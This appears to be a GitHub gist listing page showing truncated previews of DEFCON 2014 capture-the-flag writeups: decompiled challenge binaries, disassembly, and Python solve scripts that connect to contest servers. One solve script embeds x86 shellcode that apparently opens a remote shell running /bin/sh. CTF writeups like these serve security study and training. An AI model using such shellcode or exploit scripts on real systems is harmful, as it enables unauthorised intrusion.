Skip to content

Instantly share code, notes, and snippets.

View potetisensei's full-sized avatar

potetisensei

41 followers · 20 following
View GitHub Profile
@potetisensei
potetisensei / sis.c
Created February 16, 2014 12:06
DEFCON Writeup incest
int main(int argc, char *argv[]) {
int p;
int netfd;
int filefd;
signal(SIGALRM, quitter);
alarm(0x0F);
netfd = atoi(argv[2]);
filefd = atoi(argv[1]);
@potetisensei
potetisensei / penser.c
Last active August 29, 2015 13:56
DEFCON Writeup penser
int recv_fd(int fd, void *buf, int size) {
if (buf == NULL) return -1;
else if (size == 0) return 0;
return recv(fd, buf, size, 0);
}
int send_fd(int fd, void *buf, int size) {
int i = 0;
@potetisensei
potetisensei / junk.c
Created March 28, 2014 04:16
JUNK
class ECCDecodeDataStream {
public:
uint var_4[0x20];
uint var_84;
uint var_88;
uint *var_8C;
uint var_90;
uint var_94;
uint var_98;
uint var_9C;
@potetisensei
potetisensei / solve.py
Created March 28, 2014 05:08
DEFCON Writeup lena
from PIL import Image
from socket import *
from random import randint
from reedsolo import RSCodec
from struct import pack
shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
rs = RSCodec(17)
encoded_shellcode = ""
@potetisensei
potetisensei / heap.c
Created May 19, 2014 12:40
Written by @nk0t
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
int lastrand;
void (*exit_func)();
void do_exit(int arg_0)
{
@potetisensei
potetisensei / solve.py
Created May 19, 2014 13:16
DEFCON 2014 Writeup heap
from struct import pack
from socket import *
from pwn import process
chunk_data_list = [0x00000379,0x000004e8,0x00000421,0x00000489,0x00000421,0x00000429,0x00000391,0x00000379,0x00000341]
p = socket(AF_INET, SOCK_STREAM)
p.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))
#p = process("./heap")
@potetisensei
potetisensei / memo.c
Created May 19, 2014 13:28
shitsco incomplete
int global_permission; /* global_permission */
int sub_8048C30(int fd, char *buf, int size, char splitter) {
char tmp_buf[]; /* var_1D */
unsigned int ind = 0; /* register ebx */
if (size <= 0) return ind;
while (1) {
if (read(fd, tmp_buf, 1) <= 0) return -1;
@potetisensei
potetisensei / sub_8049230.txt
Last active August 29, 2015 14:01
sub_8049230
.text:08049230 sub_8049230 proc near ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest = dword ptr -4Ch
.text:08049230 src = dword ptr -48h
.text:08049230 n = dword ptr -44h
.text:08049230 var_40 = dword ptr -40h
.text:08049230 s2 = byte ptr -34h
.text:08049230 var_14 = dword ptr -14h
.text:08049230 var_10 = dword ptr -10h
.text:08049230 arg_0 = dword ptr 4
@potetisensei
potetisensei / search.py
Created May 19, 2014 14:54
DEFCON 2014 Writeup shitsco
from struct import pack
from socket import *
from pwn import process
#p = process("shit")
p = socket(AF_INET, SOCK_STREAM)
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
print p.recv(4096)
current = [ord(i) for i in ""] #[1] * 31 #list
@potetisensei
potetisensei / retr.c
Created May 19, 2014 15:32
DEFCON 2014 Writeup sftp
void retr(char *arg0) {
char *haystack = arg0;
if (strstr(haystack, "flag")) {
char var_370[] = "-Nice try,"
write_my(var_370);
return ;
}
char *var_10 = ___xpg_basename(haystack);